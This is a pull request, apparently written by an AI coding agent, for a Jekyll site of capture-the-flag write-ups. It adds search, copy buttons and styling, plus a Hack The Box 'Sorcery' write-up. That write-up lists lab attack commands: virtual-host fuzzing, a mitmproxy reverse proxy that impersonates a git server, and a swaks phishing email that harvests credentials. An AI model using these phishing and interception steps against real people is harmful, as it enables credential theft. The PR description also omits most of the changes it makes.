### PR TITLE
feat: add copyable code blocks

### DIFF
--- a/_layouts/default.html
+++ b/_layouts/default.html
@@ -13,6 +13,11 @@
       <a href="{{ '/writeups' | relative_url }}">writeups</a> |
       <a href="{{ '/about' | relative_url }}">about</a>
     </nav>
+    <div class="search-bar">
+      <input type="text" id="search-input" placeholder="search">
+      <button id="search-button" aria-label="search">&#128269;</button>
+    </div>
+    <div id="search-results"></div>
   </header>
   <main>
     {{ content }}
@@ -20,5 +25,7 @@
   <footer>
     <p>&copy; {{ site.title }}</p>
   </footer>
+  <script src="{{ '/assets/js/search.js' | relative_url }}"></script>
+  <script src="{{ '/assets/js/copy.js' | relative_url }}"></script>
 </body>
 </html>

--- a/_writeups/first-ctf.md
+++ b/_writeups/first-ctf.md
@@ -1,6 +1,7 @@
 ---
 layout: default
 title: First CTF
+platform: Hack The Box
 ---
 
 This is a placeholder write‑up for my first capture‑the‑flag challenge.

--- a/_writeups/sorcery.md
+++ b/_writeups/sorcery.md
@@ -1,0 +1,48 @@
+---
+layout: default
+title: Sorcery
+platform: Hack The Box
+---
+
+Add the IPs to `/etc/hosts`:
+
+```
+10.10.11.73 sorcery.htb git.sorcery.htb
+10.10.14.40 pwn.sorcery.htb
+```
+
+Visit [https://sorcery.htb](https://sorcery.htb) and enumerate the repository:
+
+```
+git clone https://git.sorcery.htb/nicole_sullivan/infrastructure.git
+```
+
+Enumerate virtual hosts with `ffuf`:
+
+```
+ffuf -w /usr/share/payloads/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u https://sorcery.htb -H "Host: FUZZ.sorcery.htb" -mc 200
+```
+
+This reveals `git.sorcery.htb`; add it to `/etc/hosts` and create an account on the site, then log in.
+
+Capture traffic with a rogue host and `mitmproxy`:
+
+```
+sudo mitmproxy --mode reverse:https://git.sorcery.htb --certs pwn.sorcery.htb.pem -k -p 443
+```
+
+Send a phishing email to capture credentials:
+
+```
+proxychains4 -f /etc/proxychains4.conf swaks --to tom_summers@sorcery.htb --from nicole_sullivan@sorcery.htb --server 172.19.0.10 --port 1025 --data "Subject: Security Alert\n\nPlease verify your account at https://pwn.sorcery.htb/user/login"
+```
+
+Extract the captured credentials from the proxied session:
+
+```
+magick xwd:Xvfb_screen0 credentials.png
+open credentials.png
+```
+
+*Screenshots omitted.*
+

--- a/assets/css/style.css
+++ b/assets/css/style.css
@@ -16,3 +16,68 @@ a {
 a:hover {
   text-decoration: underline;
 }
+
+.search-bar {
+  display: flex;
+  align-items: center;
+}
+
+.search-bar input {
+  background: transparent;
+  border: none;
+  border-bottom: 1px solid #0f0;
+  color: #0f0;
+}
+
+.search-bar input::placeholder {
+  color: #0f0;
+}
+
+.search-bar input:focus {
+  outline: none;
+}
+
+.search-bar button {
+  background: transparent;
+  border: none;
+  color: #0f0;
+  cursor: pointer;
+}
+
+.search-bar button:focus {
+  outline: none;
+}
+
+#search-results div {
+  margin-top: 0.5rem;
+}
+
+pre {
+  position: relative;
+  white-space: pre-wrap;
+  word-break: break-word;
+  color: #ff0;
+  background: #111;
+  border: 1px solid #0f0;
+  border-radius: 4px;
+  padding: 0.5rem 2.5rem 0.5rem 0.5rem;
+}
+
+code {
+  color: #ff0;
+}
+
+.copy-btn {
+  position: absolute;
+  top: 0.25rem;
+  right: 0.25rem;
+  background: #111;
+  border: 1px solid #0f0;
+  color: #0f0;
+  border-radius: 4px;
+  cursor: pointer;
+}
+
+.copy-btn:focus {
+  outline: none;
+}

--- a/assets/js/copy.js
+++ b/assets/js/copy.js
@@ -1,0 +1,18 @@
+// Add copy buttons to all code blocks
+window.addEventListener('DOMContentLoaded', () => {
+  document.querySelectorAll('pre').forEach(pre => {
+    const code = pre.querySelector('code');
+    const text = code ? code.innerText : pre.innerText;
+    const button = document.createElement('button');
+    button.className = 'copy-btn';
+    button.type = 'button';
+    button.innerHTML = '&#128203;';
+    button.addEventListener('click', () => {
+      navigator.clipboard.writeText(text).then(() => {
+        button.textContent = 'copied';
+        setTimeout(() => button.innerHTML = '&#128203;', 2000);
+      });
+    });
+    pre.appendChild(button);
+  });
+});

--- a/assets/js/search.js
+++ b/assets/js/search.js
@@ -1,0 +1,34 @@
+---
+---
+function initSearch() {
+  var input = document.getElementById('search-input');
+  var results = document.getElementById('search-results');
+  if (!input || !results) return;
+
+  var indexData = [];
+  fetch('{{ "/search.json" | relative_url }}')
+    .then(function(res) { return res.json(); })
+    .then(function(data) { indexData = data; });
+
+  function search() {
+    var query = input.value.trim().toLowerCase();
+    results.innerHTML = '';
+    if (!query) return;
+    var matches = indexData.filter(function(item) {
+      return item.content.toLowerCase().indexOf(query) !== -1 ||
+             item.title.toLowerCase().indexOf(query) !== -1;
+    });
+    matches.forEach(function(item) {
+      var div = document.createElement('div');
+      var a = document.createElement('a');
+      a.href = item.url;
+      a.textContent = item.title;
+      div.appendChild(a);
+      results.appendChild(div);
+    });
+  }
+
+  input.addEventListener('input', search);
+}
+
+document.addEventListener('DOMContentLoaded', initSearch);

--- a/search.json
+++ b/search.json
@@ -1,0 +1,15 @@
+---
+layout: null
+---
+[
+  {% assign pages = site.pages | where_exp: "page", "page.search_exclude != true" %}
+  {% assign writeups = site.writeups | where_exp: "page", "page.search_exclude != true" %}
+  {% assign all_pages = pages | concat: writeups %}
+  {% for page in all_pages %}
+  {
+    "title": "{{ page.title | escape }}",
+    "url": "{{ page.url | relative_url }}",
+    "content": {{ page.content | markdownify | strip_html | jsonify }}
+  }{% unless forloop.last %},{% endunless %}
+  {% endfor %}
+]

--- a/writeups/index.md
+++ b/writeups/index.md
@@ -5,8 +5,12 @@ title: Writeups
 
 # Writeups
 
+{% assign groups = site.writeups | group_by: 'platform' %}
+{% for group in groups %}
+## {{ group.name }}
 <ul>
-{% for post in site.writeups %}
+{% for post in group.items %}
   <li><a href="{{ post.url | relative_url }}">{{ post.title }}</a></li>
 {% endfor %}
 </ul>
+{% endfor %}


### PR DESCRIPTION
## Summary
- wrap code blocks to avoid horizontal scrolling
- add copy button to code samples
- pad code blocks so button doesn't overlap text
- style code blocks with bordered boxes for a cooler look

## Testing
- `bundle install 2>&1 | head -n 40`
- `bundle exec jekyll build >/tmp/jekyll.log && tail -n 20 /tmp/jekyll.log`


------
https://chatgpt.com/codex/tasks/task_e_68b326fde34c832d88751c19f3084b51